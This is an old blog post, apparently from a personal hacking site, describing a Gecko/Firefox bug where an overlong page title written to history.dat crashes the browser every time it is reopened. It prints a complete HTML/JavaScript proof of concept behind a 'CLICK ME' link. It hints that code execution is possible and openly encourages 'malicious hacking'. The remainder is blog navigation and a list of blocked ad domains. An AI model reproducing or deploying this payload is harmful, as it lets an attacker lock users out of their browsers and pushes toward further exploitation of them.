« Home

Hacking Browsers (firefox remote DoS) »Hacking Browsers (Gecko remote DoS) »Windows 2000/2003 SYN DoS Attack Protection »Think Twice »Cyber Crime Officially More Lucrative than Drug Tr... »Google's AdSense Algorithm »Exploiting Macromedia Flash »Byzantine Owns Jack Thompson »Ethical Malicious Hacking »Owning A Continent, Penetrating Testing with Google » 

Hacking Browsers (History.dat)

Published 12.09.2005 by jm | E-mail this post

E-mail this post



Remember me (?)



All personal information that you provide here will be governed by the Privacy Policy of Blogger.com. More...


Mozilla states that Gecko is "the open source web browser layout engine used in all Mozilla-branded software and its derivatives, including later Netscape releases. Written in C++, Gecko is designed to support open Internet standards. Originally created by Netscape Communications Corporation, its development is now overseen by the Mozilla Foundation".

A vulnerability in Gecko's reading History.dat file allows remote attackers to cause the program to freeze, thus causing a denial of service.Basically firefox logs all kinda of URL data in it's history.dat file, this little script will set a really large topic and Firefox will then save that topic into it's history.dat. The next time that firefox is opened, it will instantly crash due to a buffer overflow -- this will happen everytime until you manually delete the history.dat file -- which most users won't figure out.

This proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifcations.

< html>< head>< title>heh< /title>< script
type="text/javascript">
function ex() {
 var buffer = "";
 for (var i = 0; i < 5000; i++) {
  buffer += "A";
 }
 var buffer2 = buffer;
 for (i = 0; i < 500; i++) {
  buffer2 += buffer;
 }
 document.title = buffer2;
}
< /script>< /head>< body>ZIPLOCK says < a
href="javascript:ex();">CLICK ME
< /a>< /body>< /html>

    If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .

Previous hacks

Previous Hacks



    This link kills spam


    spam IP addresses


    These are sites I block at my firewall.

    cdn2.gms1.net
    gms1.net
    servedby.advertising.com
    advertising.com
    a.tribalfusion.com
    tribalfusion.com
    pimpslord.com
    altfarm.mediaplex.com
    mediaplex.com
    ad.yeildmanager.com
    yeildmanager.com
    doubleclick.net
    isg32.casalemedia.com
    casalemedia.com

    Cost of the War in Iraq
    (JavaScript Error)

Two very recommended books:


. . The only hacking forum I have found worth mentioning here